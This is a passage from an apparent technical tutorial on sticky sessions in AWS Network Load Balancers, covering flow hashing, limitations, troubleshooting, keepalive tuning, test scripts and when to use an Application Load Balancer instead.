  --target-group-arn arn:aws:elasticloadbalancing:region:acct:targetgroup/mytg/abc123
```

Sample Output:

```json
{
    "Attributes": [
        { "Key": "stickiness.enabled", "Value": "true" },
        { "Key": "stickiness.type", "Value": "source_ip" }
    ]
}
```

3. How NLB Stickiness Actually Works (Under the Hood)

The NLB’s flow hashing algorithm calculates a hash from several parameters, often the “five-tuple”:

<protocol, source IP, source port, destination IP, destination port>

The hash is used to choose a target. When stickiness is enabled, the NLB remembers this mapping for some time (typically a few minutes to hours, depending on flow expiration); a toy sketch after the list below illustrates the idea.

Key Behavior Points:

  • If the same client connects again using the same IP and port, the hash matches → same backend target.
  • If any part of that tuple changes (e.g. the client source port changes), the hash may change → the client might hit a different target.
  • NLBs maintain this mapping in memory; if the NLB node restarts or fails over, the mapping is lost.
  • Sticky mappings can also be lost when cross-zone load balancing or target health status changes.
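
To make that concrete, here is a toy model of hash-based target selection. It only illustrates the idea; AWS’s actual algorithm is internal:

# Toy flow hashing: same inputs -> same target (not AWS's real algorithm)
TARGETS=(10.0.1.10 10.0.1.11 10.0.1.12)
pick() {
  local h
  h=$(printf '%s' "$1" | cksum | cut -d' ' -f1)
  echo "$1 -> ${TARGETS[$((h % ${#TARGETS[@]}))]}"
}
pick "tcp:203.0.113.7:51000:10.0.0.5:443"   # five-tuple: a new source port can remap
pick "tcp:203.0.113.7:51001:10.0.0.5:443"
pick "203.0.113.7"                          # source_ip stickiness: stable per client IP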

Not Cookie Based

Because NLBs don’t inspect HTTP traffic, there’s no cookie involved.
This means:

  • You can’t set session duration or expiry time like in ALB stickiness.
  • Stickiness only works as long as the same network path and source IP persist.

4. Known Limitations & Edge Cases

Sticky sessions on NLBs are helpful but brittle. Here’s what can go wrong:

| Issue | Cause | Effect |
| --- | --- | --- |
| Client source IP changes | NAT, VPN, mobile switching networks | Hash changes → new target |
| Different source port | Client opens multiple sockets or reconnects | Each connection may map differently |
| TLS termination at NLB | NLB terminates TLS | Stickiness not supported (only for TCP listeners) |
| Unhealthy target | Health check fails | Mapping breaks; NLB reroutes |
| Cross-zone load balancing toggled | Distribution rules change | May break existing sticky mappings |
| DNS round-robin at client | NLB has multiple IPs per AZ | Client DNS resolver may change NLB node |
| UDP behavior | Stateless packets; different flow hash | Stickiness unreliable for UDP |
| Scaling up/down | New targets added | Hash table rebalanced; some clients remapped |

Tip: If you rely on stickiness, keep your clients stable (same IP) and avoid frequent target registration changes.

5. Troubleshooting Sticky Session Problems

When things go wrong, these are the most common patterns you’ll see:

1. “Stickiness not working”

  • Check target group attributes with aws elbv2 describe-target-group-attributes --target-group-arn <arn> and ensure stickiness.enabled is true.
  • Make sure your listener protocol is TCP, not TLS.
  • Confirm that client IPs aren’t being rewritten by NAT or proxy.
  • Check CloudWatch metrics. If one target gets all the traffic, stickiness might be too “sticky” due to limited source IP variety.

2. “Some clients lose session state randomly”

  • Verify client network stability. Mobile clients or corporate proxies can rotate IPs.
  • Confirm health checks aren’t flapping targets.
  • Review your application session design, if session data lives in memory, consider an external session store (Redis, DynamoDB, etc.).

3. “Load imbalance: one instance overloaded”

  • This can happen when many users share one public IP (common in offices or ISPs).
    All those clients hash to the same backend.
  • Mitigate by:
    • Disabling stickiness if not strictly required.
    • Using ALB with cookie based stickiness (more granular).
    • Scaling target capacity.

4. “Connections drop after some time”

  • NLB may remove stale flow mappings.
  • Check TCP keepalive settings on clients and targets. Ensure keepalive_time < NLB idle timeout (350 seconds) to prevent connection resets. Linux commands below; a tuning sketch follows this list:
# Check keepalive time (seconds before sending first keepalive probe)
sysctl net.ipv4.tcp_keepalive_time

# Check keepalive interval (seconds between probes)
sysctl net.ipv4.tcp_keepalive_intvl

# Check keepalive probes (number of probes before giving up)
sysctl net.ipv4.tcp_keepalive_probes

# View all at once
sysctl -a | grep tcp_keepalive
  • Verify idle timeout on backend apps (e.g., web servers closing connections too early).
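
To bring keepalives under that limit, one possible runtime tuning (Linux; persist it via /etc/sysctl.d to survive reboots):

# First probe after 300s, then every 30s, give up after 3 failed probes
sudo sysctl -w net.ipv4.tcp_keepalive_time=300
sudo sysctl -w net.ipv4.tcp_keepalive_intvl=30
sudo sysctl -w net.ipv4.tcp_keepalive_probes=3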

6. Observability & Testing

You can validate sticky behavior with:

  • CloudWatch metrics:
    ActiveFlowCount, NewFlowCount, and per target request metrics.
  • VPC Flow Logs: confirm that repeated requests from the same client IP go to the same backend ENI.
  • Packet captures: Use tcpdump or ss on your backend instances to see if the same source IP consistently connects.
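
For example, on a backend instance (application port 8080 assumed):

# Log new TCP connections (SYNs) to the app port, with client source IPs
sudo tcpdump -nn -i any 'tcp port 8080 and tcp[tcpflags] & tcp-syn != 0'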

Quick test with curl:

for i in {1..100}; do 
    echo "=== Request $i at $(date) ===" | tee -a curl_test.log
    curl http://<nlb-dns-name>/ -v 2>&1 | tee -a curl_test.log
    sleep 0.5
done

Run it from the same host and check which backend responds (log hostname on each instance).
Then try from another IP or VPN; you’ll likely see a different target.
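
A throwaway responder on each target makes the answering instance obvious (netcat flags vary by variant; this assumes a traditional nc with -p and -q):

# Minimal HTTP responder that reports this instance's hostname on port 8080
while true; do
  BODY="$(hostname)"
  printf 'HTTP/1.1 200 OK\r\nContent-Type: text/plain\r\nContent-Length: %s\r\n\r\n%s' "${#BODY}" "$BODY" | nc -l -p 8080 -q 1
done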

7. Best Practices

  1. Only enable stickiness if necessary.
    Stateless applications scale better without it.
  2. If using TLS: terminate TLS at the backend or use ALB if you need session affinity.
  3. Use shared session stores.
    Tools like ElastiCache (Redis) or DynamoDB make scaling simpler and safer.
  4. Avoid toggling cross-zone load balancing during live traffic; it resets the sticky map.
  5. Set up proper health checks. Unhealthy targets break affinity immediately.
  6. Monitor uneven load. Large NAT’d user groups can overload a single instance.
  7. For UDP, consider designing idempotent, stateless processing; sticky sessions may not behave reliably.

8. Example Architecture Pattern

Scenario: A multiplayer game server behind an NLB.
Each player connects via TCP to the game backend that stores their in-memory state.

✅ Recommended setup:

  • Enable stickiness.enabled = true and stickiness.type = source_ip
  • Disable TLS termination at NLB
  • Keep targets in the same AZ with cross-zone load balancing disabled to maintain stable mapping
  • Maintain external health and scaling logic to avoid frequent re-registrations

This setup ensures that the same player IP always lands on the same backend server, as long as their network path is stable.

9. Summary Table

| Attribute | Supported Value | Notes |
| --- | --- | --- |
| stickiness.enabled | true / false | Enables sticky sessions |
| stickiness.type | source_ip | Only option for NLB |
| Supported protocols | TCP; UDP (limited) | Not supported for TLS listeners |
| Persistence duration | Until flow reset | Not configurable |
| Cookie-based stickiness | ❌ No | Use ALB for cookie-based stickiness |
| Best for | Stateful TCP apps | e.g. games, custom protocols |

10. When to Use ALB Instead

If you’re dealing with HTTP/HTTPS applications that manage user sessions via cookies or tokens, you’ll be much happier using an Application Load Balancer.
It offers:

  • Configurable cookie duration
  • Per-application stickiness
  • Layer 7 routing and metrics

The NLB should be reserved for high-performance, low-latency, or non-HTTP workloads that need raw TCP/UDP handling.

11. Closing Thoughts

AWS NLB sticky sessions are a great feature, but they’re not magic glue.
They work well when your network topology and client IPs are predictable, and your app genuinely needs flow affinity. However, if your environment involves NATs, mobile networks, or frequent scale-ups, expect surprises.

When in doubt:
1. Keep your app stateless,
2. Let the load balancer do its job, and
3. Use stickiness only as a last resort for legacy or session-bound systems.
